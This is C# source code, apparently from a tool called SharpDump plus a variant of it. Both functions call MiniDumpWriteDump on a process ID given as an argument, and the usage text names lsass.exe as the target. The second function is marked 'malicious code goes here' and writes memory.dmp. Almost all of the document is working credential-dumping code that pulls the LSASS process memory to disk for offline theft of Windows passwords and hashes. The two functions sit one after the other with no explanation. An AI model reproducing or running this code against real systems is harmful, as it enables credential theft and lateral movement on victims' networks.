static int Main(string[] args)
{
if (args.Length == 0)
{
Console.WriteLine("[-] Usage SharpDump.exe Lsass.exe's Pid");
Console.WriteLine("[-] Example SharpDump.exe 1120");
return(1);
}
bool bSuccess = false;
string filename = "lsass.dmp";
FileStream fs = new FileStream(filename, FileMode.Create, FileAccess.ReadWrite, FileShare.Write);
IntPtr createPtr = GetProcAddress(LoadLibrary("Dbghelp.dll"), "MiniDumpWriteDump");
MiniDumpWriteDump miniDumpWriteDump = (MiniDumpWriteDump)Marshal.GetDelegateForFunctionPointer(createPtr, typeof(MiniDumpWriteDump));
Console.WriteLine("[+] MiniDumpWriteDump found at 0x{0}", createPtr.ToString("X"));
Int32 ProcessID = Convert.ToInt32(args[0]);
Process process = Process.GetProcessById(ProcessID);
bSuccess = miniDumpWriteDump(process.Handle, (uint)process.Id, fs.SafeFileHandle, 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
Console.WriteLine("[+] Process Completed ({0})", bSuccess);
if (bSuccess)
{
Console.WriteLine($"[+] lsass process dumped successfully and saved at {Directory.GetCurrentDirectory()}\\{filename}");
}
else
{
Console.WriteLine("[-] Cannot Dump Lsass.");
}
return(0);
}
static void Main(string[] args)
{
CleanUp();
Console.WriteLine("Clean Up Completed");
// malicious code goes here
Int32 PID = Convert.ToInt32(args[0]);
IntPtr hFile = IntPtr.Zero;
IntPtr hProc = IntPtr.Zero;
bool bSuccess = false;
IntPtr createPtr = GetProcAddress(LoadLibrary("Dbghelp.dll"), "MiniDumpWriteDump");
MiniDumpWriteDump miniDumpWriteDump = (MiniDumpWriteDump)Marshal.GetDelegateForFunctionPointer(createPtr, typeof(MiniDumpWriteDump));
Console.WriteLine("MiniDumpWriteDump found at 0x{0}", createPtr.ToString("X"));
// PROCESS_QUERY_INFORMATION | PROCESS_VM_READ = 1040
hProc = OpenProcess(1040, false, PID);
Console.WriteLine("Process HANDLE 0x{0}\n", hProc.ToString("X"));
if (hProc == IntPtr.Zero)
{
Console.WriteLine("HANDLE is NULL. Exiting");
Environment.Exit(0);
}
// GENERIC_WRITE 1073741824
// FILE_SHARE_WRITE 2
// CREATE_ALWAYS 2
// FILE_ATTRIBUTE_NORMAL 128
hFile = CreateFile("memory.dmp", 1073741824, 2, IntPtr.Zero, 2, 128, IntPtr.Zero);
Console.WriteLine("memory.dmp HANDLE 0x{0}\n", hFile.ToString("X"));
if (hFile == IntPtr.Zero)
{
Console.WriteLine("HANDLE is NULL. Exiting");
Environment.Exit(0);
}
bSuccess = miniDumpWriteDump(hProc, PID, hFile, 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
Console.WriteLine("Process Completed ({0})", bSuccess);
}
